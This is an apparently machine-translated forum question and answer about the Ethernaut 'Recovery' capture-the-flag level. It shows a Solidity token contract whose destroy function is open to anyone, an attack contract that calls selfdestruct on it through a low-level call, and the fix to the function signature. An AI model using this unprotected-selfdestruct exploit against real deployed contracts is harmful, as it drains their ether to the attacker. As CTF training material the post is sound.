我正在进行ethernaut Recovery CTF。为此,我不得不在另一个合同中调用"destroy"函数。我这样做将有助于"呼叫"的稳固性。但交易正在恢复。
要攻击的合同
contract SimpleToken {
using SafeMath for uint256;
// public variables
string public name;
mapping (address => uint) public balances;
// constructor
constructor(string memory _name, address _creator, uint256 _initialSupply) public {
name = _name;
balances[_creator] = _initialSupply;
}
// collect ether in return for tokens
receive() external payable {
balances[msg.sender] = msg.value.mul(10);
}
// allow transfers of tokens
function transfer(address _to, uint _amount) public {
require(balances[msg.sender] >= _amount);
balances[msg.sender] = balances[msg.sender].sub(_amount);
balances[_to] = _amount;
}
// clean up after ourselves
function destroy(address payable _to) public {
selfdestruct(_to);
}
}
攻击合约
//SPDX-License-Identifier:MIT
pragma solidity ^0.8.0;
contract recovery_solution{
address victim = 0x0EB8e4771ABA41B70d0cb6770e04086E5aee5aB2;
function destroy1(address _to) public{
(bool success, ) = victim.call(abi.encodeWithSignature("destroy(address payable)", _to));
require(success, "Transaction failed");
}
}
有人能告诉我我的攻击代码出了什么问题吗?
address payable
类型在函数签名中简单地表示为address
。
victim.call(abi.encodeWithSignature("destroy(address)", _to));
文档:https://docs.soliditylang.org/en/v0.8.17/abi-spec.html#mapping-abi型的坚固性